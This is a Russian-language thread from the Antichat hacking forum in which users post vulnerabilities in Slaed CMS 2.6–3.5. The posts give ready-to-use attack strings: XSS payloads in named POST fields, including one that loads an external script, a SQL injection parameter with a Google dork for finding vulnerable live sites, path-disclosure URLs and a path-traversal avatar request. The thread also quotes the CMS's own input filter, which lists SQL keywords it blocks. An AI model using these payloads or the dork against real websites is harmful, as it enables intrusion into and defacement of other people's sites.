ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.05.2008, 23:23
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию

Ещё пассивки в POST-запросах в Slaed CMS 3.5:
Код:
http://test6.ru/index.php?name=Pages&op=add
Уязвимы postname, subject
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #2  
Старый 09.06.2008, 14:15
RRRinat
Новичок
Регистрация: 01.12.2007
Сообщений: 3
С нами: 9707089

Репутация: 0
По умолчанию

SLAED.net на хрен взломан. Сейчас - недостпен.
http://antislaedcms.ru/index.php?showtopic=2513
http://forum.slaedsuck.com/
 
Ответить с цитированием

Xss в SLAED CMS 3.5
  #3  
Старый 03.08.2008, 22:18
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
С нами: 10061666

Репутация: 2438
По умолчанию Xss в SLAED CMS 3.5

Post-запрос на странице http://site/index.php?name=Account &op=new_user
Код:
"><script src=http://site/script.js>
в полях- gfx_check та random_num
 
Ответить с цитированием

  #4  
Старый 04.09.2008, 21:08
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

sql-inj в модуле анекдотов Jokes (дефолтный в слаед 3.3+ )
параметр cat:
Цитата:
/index.php?name=Jokes&op=CatView&cat={sql}
dork:
Цитата:
inurl:index.php?name=Jokes+inurl:cat=
 
Ответить с цитированием

  #5  
Старый 01.11.2009, 14:28
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

CMS Slaed 2.6 Lite

Раскрытие путей

/index.php?name=Html_Content&op[]=page
/index.php?name=Account&op=info&uname[]=123

Уязвим файл /function/security.php

Код:
PHP код:
foreach ($_GET as $var_name=>$var_value) {
        if (
preg_match("/<.*?(script|body|object|iframe|applet|meta|style|form|img|onmouseover).*?>/i"urldecode($var_value)) || preg_match("/\([^>]*\"?[^)]*\)/"$var_value) || preg_match("/\"|\'/"$var_value)) warn_report("HTML in GET - ".$var_name." = "$var_value."");
        if (
$security_url_get == 1) {
            if (
preg_match("/^(http\:\/\/|ftp\:\/\/|\/\/|https:\/\/|php:\/\/|\/\/)/i"$var_value)) warn_report("URL in GET - ".$var_name." = "$var_value);
        }
        
$security_string "/UNION|OUTFILE|SELECT|ALTER|INSERT|DROP|".$prefix."_admins|".$prefix."_users|ModAdmin|SaveAdmin|EditAdmin|DelAdmin/i";
        
$security_decode base64_decode($var_value);
        if (
preg_match($security_string$security_decode)) hack_report("Hack base64 in GET - ".$var_name." = "$var_value."");
        if (
preg_match($security_string$var_value)) hack_report("Hack in GET - ".$var_name." = "$var_value."");
        
$security_slash preg_replace("/\/\*.*?\*\//"""$var_value);
        if (
preg_match($security_string$security_slash)) hack_report("Hack in GET - ".$var_name." = "$var_value."");
    } 
Незнаю даже как назвать. Вообщем.

/index.php?name=Account&op=saveavatar&category=2&av atar=../../../index.php

и в аватарке будет загружатся index.php

Уязвимый код:

PHP код:
$user_avatar = ($userinfo && file_exists("".$adirectory."/".$userinfo."")) ? "<img src=\"".$adirectory."/".$userinfo."\" alt=\"$user_name\" title=\"$user_name\" />" "<img src=\"".$adirectory."/00.gif\" alt=\"$user_name\" title=\"$user_name\" />"
Возможно ещё что нибудь найду.

XSS (Пассивная)

//"><script>alert();</script>
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
[ Обзор уязвимостей WCPS ] Dr.Z3r0 Веб-уязвимости 36 07.07.2012 15:43
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей Exponent CMS ] ZAMUT Веб-уязвимости 1 02.02.2010 21:59
[ Обзор уязвимостей Gekko CMS ] Grey Веб-уязвимости 0 03.02.2008 20:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.